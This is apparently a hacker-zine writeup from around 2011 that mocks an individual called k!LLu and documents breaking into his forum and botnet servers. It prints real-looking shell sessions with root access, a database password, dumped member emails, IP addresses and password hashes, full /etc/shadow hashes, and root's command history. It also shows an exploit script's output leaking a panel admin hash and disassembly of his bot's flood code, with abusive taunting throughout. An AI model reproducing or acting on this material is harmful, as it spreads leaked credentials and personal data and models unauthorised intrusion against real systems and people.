</body>
# cd ..
# cd scene-sector.to
# ls -la
total 16
drwxrwx--- 3 ucsu www 512 Apr 7 2011 .
drwxr-x--- 8 ucsu www 512 Aug 16 17:06 ..
-rw-r--r-- 1 root www 261 Apr 5 2011 index.php
drwxr-xr-x 6 root www 512 Apr 9 2011 test
# cd test
# ls -la
total 24
drwxr-xr-x 6 root www 512 Apr 9 2011 .
drwxrwx--- 3 ucsu www 512 Apr 7 2011 ..
drwxrwxrwx 3 root www 512 Apr 7 2011 4234047??hscjfsjdf89ds89898j34jjfdhhs9322jss
drwxr-xr-x 5 root www 512 Apr 7 2011 admin
drwxr-xr-x 3 root www 512 Apr 7 2011 designe
drwxr-xr-x 3 root www 512 Apr 9 2011 img
# ls -la
total 15032
drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 .
drwxr-x--- 8 ucsu www 512 Aug 16 17:06 ..
drwxr-xr-x 8 root www 512 Apr 30 00:07 .trash
-rw-r--r-- 1 root www 1799843 May 5 18:04 SpyEye.Builder.v1.2.99.zip
-rw-r--r-- 1 root www 320512 Jun 6 20:45 back.exe
-rw-r--r-- 1 root www 118784 Jun 6 14:22 backs.exe
-rw-r--r-- 1 root www 4538223 Jun 6 14:45 backspace.rar
-rw-r--r-- 1 root www 7168 May 11 13:26 elite_4.2.exe
drwxr-xr-x 3 ucsu www 512 Sep 29 18:50 files
-rw-r--r-- 1 ucsu www 408 Feb 6 2011 ico.png
-rw-r--r-- 1 ucsu www 1053 Feb 6 2011 icon_icq.png
-rw-r--r-- 1 ucsu www 536 Aug 21 15:59 index.php
-rw-r--r-- 1 root www 515 May 4 10:00 index.php_
-rw-r--r-- 1 ucsu www 162 Feb 6 2011 index_.html
drwxr-xr-x 12 ucsu www 512 Sep 27 12:59 ipb3
drwxr-xr-x 2 root www 512 May 4 09:58 ipboard
drwxr-xr-x 21 root www 1024 Apr 16 16:07 ipboard___beta
-rw-r--r-- 1 ucsu www 25474 Feb 6 2011 logo.jpg
-rw-r--r-- 1 ucsu www 4657 Feb 6 2011 logo.png
-rw-r--r-- 1 root www 44909 May 4 09:53 mainlogo.png
drwxr-xr-x 2 root www 512 Jun 6 14:31 private
-rw-r--r-- 1 root www 253952 May 5 16:32 snap.exe
drwxr-xr-x 3 root www 512 Aug 14 22:01 snapshot
-rw-r--r-- 1 root www 118784 Jun 6 14:39 stansecu.exe
drwxr-xr-x 3 root www 512 May 4 11:15 static
-rw-r--r-- 1 ucsu www 107003 Sep 16 16:20 test.rar
-rw-r--r-- 1 root www 118784 May 18 19:35 v2.exe
-rw-r--r-- 1 root www 118784 May 18 19:35 v3.exe
# cd private
# ls -la
total 8908
drwxr-xr-x 2 root www 512 Jun 6 14:31 .
drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 ..
-rw-r--r-- 1 root www 4538210 Jun 6 14:32 backspace.rar
-rw-r--r-- 1 root www 44 Jun 6 13:23 index.php
# cat index.php
Certificate not found.
-- Access prohibited
Alright, before we continue, lets have a look at some of k!LLu's
enhancements he stated after Undercover.su left its beta status:
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| k!LLu: Fassen wir kurz zusammen, unsere Datenbank enthält nun |
| keine IP Adressen mehr, es ist nahezu unmöglich |
| IP-Adressen mitzuloggen, die Passwörter sind "uncrackbar" |
| gespeichert. Alle Beiträge, E-Mail's, Themen und PM's |
| sind unlesbar verschluesselt. Selbst ein Hack wäre nun |
| völlig egal und sinnfrei! |
|____________________________________________________________________|
As we can see, it clearly should not be possible to take any advantage
of hacking undercover.su because of its highly encrypted database.
# grep ucsu /var/log/proftpd-transfer.log | tail
Thu Sep 29 16:57:38 2011 0 77.20.18.64 1994 /home/ucsu/undercover.su/ipb3/public/style_css/css_8/calendar_select.css a _ o r ucsu ftp 0 * c
Thu Sep 29 16:59:00 2011 0 77.20.18.64 79303 /home/ucsu/undercover.su/ipb3/public/style_css/ipb_styles.css a _ i r ucsu ftp 0 * c
Thu Sep 29 17:03:42 2011 1 77.20.18.64 93766 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c
Thu Sep 29 17:07:28 2011 0 77.20.18.64 34809 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c
Thu Sep 29 17:08:43 2011 0 77.20.18.64 33154 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c
Thu Sep 29 17:08:59 2011 0 77.20.18.64 33154 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg a _ d r ucsu ftp 0 * c
Thu Sep 29 17:13:31 2011 0 77.20.18.64 41797 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c
Thu Sep 29 17:17:35 2011 0 77.20.18.64 59481 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c
Thu Sep 29 17:19:14 2011 1 77.20.18.64 93766 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c
Thu Sep 29 18:49:59 2011 1 77.20.18.64 160997 /home/ucsu/undercover.su/files/design.PNG b _ i r ucsu ftp 0 * c
Seems like undercover.su/ipb3 is the latest version of k!LLu's project
# cd ipb3
# cat conf_global.php
<?php
$INFO['sql_driver'] = 'mysql';
$INFO['sql_host'] = 'localhost';
$INFO['sql_database'] = 'ucsu_ipb';
$INFO['sql_user'] = 'ucsu_ipb';
$INFO['sql_pass'] = '712987asdxyas';
$INFO['sql_tbl_prefix'] = 'ucsec_';
$INFO['sql_debug'] = '0';
$INFO['sql_charset'] = '';
$INFO['board_start'] = '1317041609';
$INFO['installed'] = '1';
$INFO['php_ext'] = 'php';
$INFO['safe_mode'] = '0';
$INFO['board_url'] = 'http://www.undercover.su/ipb3';
$INFO['banned_group'] = '5';
$INFO['admin_group'] = '4';
$INFO['guest_group'] = '2';
$INFO['member_group'] = '3';
$INFO['auth_group'] = '1';
$INFO['use_friendly_urls'] = '1';
$INFO['_jsDebug'] = '0';
$INFO['mysql_tbl_type'] = 'MyISAM';
define('IN_DEV', 0);
?>
# mysql -u ucsu_ipb ucsu_ipb -p712987asdxyas
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 465217
Server version: 5.0.89-log FreeBSD port: mysql-server-5.0.89
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> SELECT member_id, name, email, ip_address, members_pass_hash, members_pass_salt FROM ucsec_members LIMIT 10;
+-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+
| member_id | name | email | ip_address | members_pass_hash | members_pass_salt |
+-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+
| 1 | s1mpl3x | purplera1n@safe-mail.net | 77.20.18.64 | 517cc224929adfa4906328f1ae42bf22 | !4w3= |
| 2 | medi8tor | ace1992@gmx.net | | 4f6f0b6261c8363a71b6fdfdc037610d | J-|`H |
| 3 | usrid3 | usrid3@undercover.su | | 058089135cfab52cc9d1ba6ef32ea202 | 0]qxI |
| 4 | usrid4 | usrid4@undercover.su | | f29637821bb0e05a55dc8ebf9e24e06f | #}(TJ |
| 5 | test | test@mail.de | | 0bb5a87636ebda286ceea9494d48dc12 | 9N2t, |
| 6 | Man4ic | mrajabi@hotmail.de | | f0a77e175ea95c9b24e2e24eba27c51b | Q}lRm |
| 7 | bin | binary@secure-mail.biz | | 8ae8499691d35b04442a6ba87a92a9fa | JM;3! |
| 8 | Ixde | angela.krueger@hotmail.de | | 5b7eee531e99f89be45ff928d7e045ab | qfi7X |
| 9 | casy | 76671253@trash-mail.com | | abddc59b20ad591d10b47b02bd70d426 | 4G:(s |
| 10 | soldier16 | musekeule@yahoo.de | | 1079fe12b4d9e3429c8975920c79a161 | *Y$cj |
+-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+
10 rows in set (0.00 sec)
mysql> SELECT msg_post, msg_ip_address FROM ucsec_message_posts WHERE msg_author_id = 1 LIMIT 1;
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+
| msg_post | msg_ip_address |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+
| Meld dich ICQ 83885,<br />wenn dein Tut haelt was es verspricht kann ich dir auch gerne ne Menge in Bar zukommen lassen -- je nachdem wieviel im Shop ist,<br />kann 15k Ukash daily nahezu Instant auscashen | 7 |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+
1 row in set (0.00 sec)
mysql> Ctrl-C -- exit!
Aborted
#
WHAT THE FUCK IS THIS GUY TALKING ABOUT?!@# It's driving us insane,
because we thought that hacking Undercover.su would be at least a bit,
a _BIT_, of a challenge. But fucking NO! k!LLu is by far the dumbest
person to be ever slapattacked by us. That's why we were not satisfied
with the simple ownage of Undercover.su and headed over to his other
projects ...
,;~;,
_/\
\ )
(\\ ())
/';;,, // |
-------====={ k!LLu's Botnet }========))))))))))))))=m( )_ __
| ,(.' '~/()' ' '\
We could now tell you a story about love and ~ | ||( );,
romance, about people dying and fighting as ( ,;.)-\ / ';,
heroes, about people suffering and crying. But \ ( \ (
instead, we now shall tell you the story of how || \\
we raped k!LLu and his little botnet to hell and /_( /_(
back. So here it is: .
/ \
_\ /_
. . (,'v`.) . .
\) ( ) ,' `. ( ) (/
\`. / `-' `-' \ ,'/
: ' _______ ' :
| _,-' ,-. `-._ |
|,' ( )__`-'__( ) `.|
(|,-,'-._ _.-`.-.|)
/ /<(o )> <(o )>\ \
: : | | : :
| | ; : | | ------ k!LLu, thou shall
| | (.-.) | | officially be owned
| | ,' ___ `. | | to fuck.
; |)/ ,'---'. \(| :
_,-/ |/\( )/\| \-._
_..--'.-( | `-'''-' | )-.`--.._
`. ;`._________,': ,'
,' `/ \'`.
`------.------'
One thing that has always been connected to k!LLu was the botnet he
kept bragging about. It probably all started back at crimenetwork when
he ddosed competitors to at least get some visitors. Knowing k!LLu,
one would think his botnet was just imaginary like most of the other
things he rambles about. But no, k!LLu actually had a botnet for which
he used his own botsoftware "Snap Reloaded". Unsurprisingly, this
piece of malware is just as bad as most of the other things he has
been working on. If you don't find at least two pre-auth
vulnerabilities within a minute of looking at the panel's source you
must be seriously retarded and it was accordingly easy to break into
his boxes. k!LLu hosts more than one panel most of which are run from
separate VMs and probably belong to some of his customers. In fact
everyone who's hosting their net on k!llu's server is actually
donating bots to k!LLu. He is a master of advertising but
unfortunately, he doesn't take telling the truth too seriously. That's
why we'll take a look into the "Snap Reloaded" bot he is selling.
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| [+] User-Mode (ring3) r00tkit |
| -> [+] run's as a service and hide himself |
| -> [+] hides&protect root process |
| -> [+] hides&protect files |
| -> [+] hides root processes |
| -> [+] hides used local&remote TCP Port(s) <- thx to jeffosz |
| -> [+] hides used local&remote UDP Port(s) <- thx to jeffosz |
| -> [+] hides used regkey''s |
|____________________________________________________________________|
You don't think k!LLu'd be shameless enough to _invent_ a feature? He
did. Well, at least not a single binary we could get our hands on
showed any signs of a rootkit. A 3-year-old would be able to kill the
process and kick that piece of shit into the trashcan.
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| [+] METAMORPHIC architecture |
| -> [+] use random legit process,file & service names |
| -> [+] generate a unique stub every run |
| -> [+] whole software gets metamorph virtualized byte per byte |
|____________________________________________________________________|
Again, a hardcoded list of processnames, that aren't at all "legit" is
not that cool. And, unsurprisingly, the bot isn't virtualized. But
hey, he used UPX, we give him that.
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| [+] webpanel developped with dreamweaver cs5 and own ajax |
| framework using mysql and php |
| -- no ressource wasting jquery/extJS shit like kerber0s, |
| EliteLoader |
| [+] multi theme support |
| [+] multi command support => every victim can do as many threads |
| as you want |
| [+] reliable protocoll which creates the lowest possible server |
| load |
| [+] modularized structure |
| [+] Blocks common Trackers |
| [+] dynamic ConnectionDelay => if server load raises, delay |
| raises and you are able to host over 25000Victims on a little |
| VPS |
|____________________________________________________________________|
The next thing on the list is the webpanel. It's partially ioncube
encoded but still runs perfectly without even changing anything. As
said above, it's also pretty straight forward to find several vulns in
it. But wait:
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| [+] XSS/SQLi Prevention Firewall |
|____________________________________________________________________|
And we really gotta say: this thing is the shit. Well, of course it
doesn't exist but who'd bother and check anyways?
$ ./killu_u_r_lame.pl bgate.secure-host.in
bl1ng bl1ng!
admin:76a2173be6393254e72ffa4d6df1030a
$
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| Another interessting thing is, thats is the WORLDS FIRST BOT |
| which patches tcpip.sys/tcpstack on ALL WIN-OS(including Win8) |
| via DCI and Windows-own Testsigning Mode |
| This allows us again to use half-open connections and rawSockets! |
| and grant us to use things like IP Spoofing or REAL SYNFLOOD ! |
| |
| This is the really awesome part, of this state-of-the-Art Botnet |
| software! DDoS Class is written in pure (m)ASM to get the maximum |
| possible stability and maximum possible Attack-strength/Power. |
| Everyone who says his Bot is stronger, LIES |
| There's NO WAY to get DDoS stronger! |
|____________________________________________________________________|
Wow, k!LLu talking about people lying, somewhat ironic. Let's have a
look at this badass functions of his.
[...]
movzx eax, byte ptr [ebp+14] ; |
mov dword ptr [ebp-C], ebx ; |
mov dword ptr [ebp-8], esi ; |
mov esi, dword ptr [ebp+8] ; |
mov byte ptr [ebp-11], al ; |
xor eax, eax ; |
mov dword ptr [ebp-4], edi ; |
mov edi, dword ptr [ebp+C] ; |
movsx ebx, word ptr [ebp+10] ; |
mov dword ptr [esp+8], eax ; |
mov eax, 1 ; |
mov dword ptr [esp+4], eax ; |
mov dword ptr [esp], 2 ; |
call near dword ptr [41E0E8] ; \socket
mov dword ptr [esi+190], eax
sub esp, 0C
inc eax ; |
je 004029E6 ; |
movzx eax, bx ; |
mov dword ptr [esp], eax ; |
call near dword ptr [41E0E0] ; \ntohs
mov ecx, 2
mov word ptr [esi+194], cx
sub esp, 4
mov word ptr [esi+196], ax ; |
mov eax, dword ptr [edi] ; |
mov dword ptr [esp], eax ; |
call near dword ptr [41E0E4] ; \inet_addr
sub esp, 4
inc eax ; |
je 00402A10 ; |
mov eax, dword ptr [edi] ; |
mov dword ptr [esp], eax ; |
call near dword ptr [41E0E4] ; \inet_addr
sub esp, 4
mov dword ptr [esi+198], eax
cmp byte ptr [ebp-11], 0
jnz 00402A02
mov dword ptr [ebp-10], 1
lea eax, dword ptr [ebp-10] ; |
mov dword ptr [esp+8], eax ; |
mov eax, 8004667E ; |
mov dword ptr [esp+4], eax ; |
mov eax, dword ptr [esi+190] ; |
mov dword ptr [esp], eax ; |
call near dword ptr [41E0A8] ; \ioctlsocket
mov eax, 10
sub esp, 0C
mov dword ptr [esp+8], eax ; |
lea eax, dword ptr [esi+194] ; |
mov dword ptr [esp+4], eax ; |
mov eax, dword ptr [esi+190] ; |
mov dword ptr [esp], eax ; |
call near dword ptr [41E0D8] ; \connect
[...]
This is an excerpt from his "synflood" function. It's obvious that
creating a new sockaddr structure for every time you call connect is
not efficient at all. He also seems to think setting a socket to
non-blocking mode via ioctlsocket would make his simple tcp flood look
like a synflood. But let's look at the code that calls this from
within the ddos thread and quickly reveals that this is compiler
generated rather than "plain assembly".
push ebp
mov ebp, esp
[...]
mov eax, dword ptr [41E06C] ; |||
mov eax, dword ptr [eax+14] ; |||
mov dword ptr [esp], eax ; |||
call <jmp.&msvcrt.atoi> ; ||\atoi
mov dword ptr [ebp-70], eax ; ||
mov eax, dword ptr [41E06C] ; ||
mov eax, dword ptr [eax+C] ; ||
mov dword ptr [esp], eax ; ||
call <jmp.&msvcrt.atoi> ; |\atoi
mov dword ptr [ebp-74], eax ; |
mov eax, dword ptr [41E06C] ; |
mov eax, dword ptr [eax+8] ; |
mov dword ptr [esp], eax ; |
call <jmp.&msvcrt.atoi> ; \atoi
[...]
mov esi, esi ; plain asm in the hewd
[...]
mov dword ptr [esp], 0 ; |
call <jmp.&KERNEL32.ExitThread> ; \ExitThread
[...]
But don't be too sad, k!LLu. We got some exciting news for you:
userspace ddos code is not the bottleneck. You're probably trying to
get your bots back after we rmd your box but we're afraid we were able
to clean a majority of them up.
# uname -a
Linux link.cyberhost.kz 2.6.18-238.9.1.el5.028stab089.1PAE #1 SMP Thu Apr 14 14:38:02 MSD 2011 i686 athlon i386 GNU/Linux
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
lxlabs:x:500:500::/home/lxlabs:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
truevm:x:503:503:System User for 130:/home/truevm:/usr/bin/lxopenvz
stansecuvm:x:504:504:System User for 140:/home/stansecuvm:/usr/bin/lxopenvz
bnetvm:x:506:506:System User for 160:/home/bnetvm:/usr/bin/lxopenvz
scriptstvm:x:508:508:System User for 180:/home/scriptstvm:/usr/bin/lxopenvz
spikevm:x:514:514:System User for 240:/home/spikevm:/usr/bin/lxopenvz
xtothecvm:x:515:515:System User for 250:/home/xtothecvm:/usr/bin/lxopenvz
y00vm:x:516:516:System User for 260:/home/y00vm:/usr/bin/lxopenvz
iodasvm:x:517:517:System User for 270:/home/iodasvm:/usr/bin/lxopenvz
rootvm:x:520:520:System User for 300:/home/rootvm:/usr/bin/lxopenvz
stansocksvm:x:521:521:System User for 310:/home/stansocksvm:/usr/bin/lxopenvz
bdgatevm:x:524:524:System User for 340:/home/bdgatevm:/usr/bin/lxopenvz
fredvm:x:525:525:System User for 350:/home/fredvm:/usr/bin/lxopenvz
spike80vm:x:526:526:System User for 360:/home/spike80vm:/usr/bin/lxopenvz
ixdevm:x:527:527:System User for 370:/home/ixdevm:/usr/bin/lxopenvz
wohovm:x:528:528:System User for 380:/home/wohovm:/usr/bin/lxopenvz
sethvm:x:529:529:System User for 390:/home/sethvm:/usr/bin/lxopenvz
# cat /etc/shadow
root:$1$v.vPGI.9$s9ss0TBUPqOe9X3ufPT4W1:15105:0:99999:7:::
bin:*:15105:0:99999:7:::
daemon:*:15105:0:99999:7:::
adm:*:15105:0:99999:7:::
lp:*:15105:0:99999:7:::
sync:*:15105:0:99999:7:::
shutdown:*:15105:0:99999:7:::
halt:*:15105:0:99999:7:::
mail:*:15105:0:99999:7:::
news:*:15105:0:99999:7:::
uucp:*:15105:0:99999:7:::
operator:*:15105:0:99999:7:::
games:*:15105:0:99999:7:::
gopher:*:15105:0:99999:7:::
ftp:*:15105:0:99999:7:::
nobody:*:15105:0:99999:7:::
nscd:!!:15105:0:99999:7:::
vcsa:!!:15105:0:99999:7:::
rpc:!!:15105:0:99999:7:::
mailnull:!!:15105:0:99999:7:::
smmsp:!!:15105:0:99999:7:::
pcap:!!:15105:0:99999:7:::
dbus:!!:15105:0:99999:7:::
haldaemon:!!:15105:0:99999:7:::
avahi:!!:15105:0:99999:7:::
sshd:!!:15105:0:99999:7:::
avahi-autoipd:!!:15105:0:99999:7:::
rpcuser:!!:15105:0:99999:7:::
nfsnobody:!!:15105:0:99999:7:::
apache:!!:15106::::::
lxlabs:!!:15106:0:99999:7:::
mysql:!!:15106::::::
truevm:$1$Cp/eTTFF$nqVR5/rgSvqs51UIuz6Et.:15251:0:99999:7:::
stansecuvm:$1$o3WpZh6S$mPXWzQjMEL5zIkwBFhGGD1:15112:0:99999:7:::
bnetvm:$1$V.AhGgm3$o4ZdgfznQ3sE2.1KJa0qx/:15115:0:99999:7:::
scriptstvm:$1$W5AWFCAH$dbJijEizlB92aFTY7HCDX.:15116:0:99999:7:::
spikevm:$1$m1v5zxhw$xs3WszkyroI/FWi8djdo4.:15132:0:99999:7:::
xtothecvm:$1$D9ZLxI1c$Sopa3HPCOBTRC4c6KBtCD/:15134:0:99999:7:::
y00vm:$1$k1GqAtHB$mdsd292s..nL/v6YG5Tfz0:15138:0:99999:7:::
iodasvm:$1$6laui1W/$L/evF8MACUrrJ.AUbBC2E.:15138:0:99999:7:::
rootvm:$1$0rDTGCQP$1OK0z1ldsptZuWD9YJmfM.:15201:0:99999:7:::
stansocksvm:$1$KbcEDmUM$Idr7lpMI/JOYU0pY3uafF/:15201:0:99999:7:::
bdgatevm:$1$0TIPnn9P$.IoVhoG0DYMW0gUfzUqnH/:15208:0:99999:7:::
fredvm:$1$QKXpFmyk$tNA8I7G6ZCc5eKbuHyHTr/:15222:0:99999:7:::
spike80vm:$1$Ir2OIga1$Xfp.9xdaXFWaaxc18Q/hR/:15224:0:99999:7:::
ixdevm:$1$xK6jSstU$cOuss77pdmE6YfUmBL2pa1:15226:0:99999:7:::
wohovm:$1$SRfLhbuK$gz/o3IYB/WJdHKGPhll6z0:15233:0:99999:7:::
sethvm:$1$aal3q4fB$bf2DeWIqbsZ/IVjBGhepv0:15250:0:99999:7:::
# pwd
/root
# alias ls="ls -la"
# ls
total 341288
drwxr-x--- 4 root root 4096 Oct 9 08:20 .
drwxr-xr-x 25 root root 4096 Oct 10 05:48 ..
-rw------- 1 root root 6069 Oct 9 08:37 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
drwxr-xr-x 16 root root 4096 May 10 2009 .etc
-rw------- 1 root root 41 Oct 9 07:59 .lesshst
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
-rw-r--r-- 1 root root 134392688 May 12 02:28 1000mb.bin
-rw-r--r-- 1 root root 135565568 May 12 05:16 1000mb.bin.1
-rw-r--r-- 1 root root 30797000 May 12 02:23 100mb.test
-rw-r--r-- 1 root root 48135408 May 12 02:55 100mb.test.1
-rw------- 1 root root 1171 May 11 09:46 anaconda-ks.cfg
-rw-r--r-- 1 root root 719 May 12 01:03 hypervm-install-master.sh
-rw-r--r-- 1 root root 14502 May 11 09:46 install.log
-rw-r--r-- 1 root root 2886 May 11 09:46 install.log.syslog
drwxr-xr-x 7 root root 4096 May 12 01:04 program-install
-rw-r--r-- 1 root root 68091 Jun 4 2009 program-install.zip
# cat .bash_history
yum install openssh-server net-snmp
nano /etc/snmp/snmpd.conf
/etc/init.d/snmpd restart
exit
top
setenforce 0
wget http://download.lxcenter.org/download/hypervm/production/hypervm-install-master.sh
sh ./hypervm-install-master.sh --virtualization-type=xen/openvz/NON
sh ./hypervm-install-master.sh --virtualization-type=openvz
nano /etc/grub.conf
shutdown -r now
wget http://mirror.leaseweb.com/speedtest/1000mb.bin
top
service hypervm
service hypervm start
yum install iptraf
iptraf
nano /etc/resolv.conf
nano /etc/resolv.conf
ifconfig
tracert
tracert 193.107.16.183
193.107.16.82
tracert 193.107.16.183
wget http://cachefly.cachefly.net/100mb.test
wget http://cachefly.cacwget http://cachefly.cachefly.net/100mb.testhefly.net/100mb.test
get http://cachefly.cachefly.net/1000mb.test
wget http://cachefly.cachefly.net/1000mb.test
wget http://cachefly.cachefly.net/100mb.test
wget http://mirror.leaseweb.com/speedtest/1000mb.bin
lsmod |grep -i ipt_conntrack
/sbin/modprobe ipt_owner
/sbin/modprobe ipt_recent
/sbin/modprobe ipt_tos
/sbin/modprobe ipt_TOS
/sbin/modprobe ipt_LOG
/sbin/modprobe ip_conntrack
/sbin/modprobe ipt_limit
/sbin/modprobe ipt_multiport
/sbin/modprobe iptable_filter
/sbin/modprobe iptable_mangle
/sbin/modprobe iptable_TCPMSS
/sbin/modprobe iptable_tcpmss
/sbin/modprobe ipt_tcpmss
/sbin/modprobe ipt_ttl
/sbin/modprobe ipt_length
/sbin/modprobe ipt_state
/sbin/modprobe ipt_nat
/sbin/modprobe ip_nat_ftp
nano /etc/sysconfig/iptables-config
nano /etc/sysconfig/vz
service iptables restart
service vz start
service vz stop
service iptables restart
service vz start
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 3306 -j DROP
ping www.besthotshop.info
ping www.ddstores.com
modprobe ipt_limit
nano /etc/sysconfig/iptables-config
nano /etc/sysconfig/vz
iptables restart
/etc/init.d/iptables restart
vzctl set 110 --iptables "ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp --save
save
-- save
vzctl set 110 --iptables iptable_nat --save
vzctl stop 110
vzctl set 110 --iptables iptable_nat --save
vzctl set 110 --iptables iptable_nat ipt_limit --save
vzctl set 110 --iptables ipt_limit --save
vzctl restart 110
vzctl stop 110
nano /etc/sysconfig/vz
service vz restart
vzctl set 110 --numiptent 2000 --save
vzctl stop 110
vzctl set 110 --iptables
vzctl set 110 --iptables ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp --save
vzctl set 110 --iptables
vzctl set 110 --iptables -h
vzctl set 110 -h
vzctl set 110 --help
modprobe ipt_limit
ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_l
iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 -j DROP
iptables --flush
service vz restart
iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 8 -j DROP
sdasdasdasd
modprobe ipt_connlimit
nano /etc/sysconfig/vz
nano /etc/sysconfig/iptables-config
/etc/init.d/iptables restart
service vz restart
shutdown -r now
service vz restart
lsmod | grep ipt
modprobe -v xt_connlimit
echo 2262144 > /proc/sys/net/ipv4/ip_conntrack_max
echo 22262144 > /proc/sys/net/ipv4/ip_conntrack_max
dmeg
dmesg
iptables --flush
service iptables restart
iptraf
modprobe xt_state
sysctl net.ipv4.netfilter.ip_conntrack_max
wc -l /proc/net/ip_conntrack
sysctl -
sysctl -po
sysctl -p
nano /etc/sysctl.conf
sysctl -p
nano /etc/sysctl.conf
sysctl -p
sysctl -p | grep mem
sysctl -p | grep mem
yum install htop
system-config-network
ifconfig
ping 193.107.17.66
ping 193.107.17.67
iptables --flush
ping 193.107.17.80
sysctl -p | grep mem
ping 193.107.17.66
ping 193.107.17.80
nano /etc/sysctl.conf
service network restart
ip route
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82
service network restart
service network restart
ip route
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.66
ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82
ip route
ip route add 193.107.17.80 dev venet0 scope link
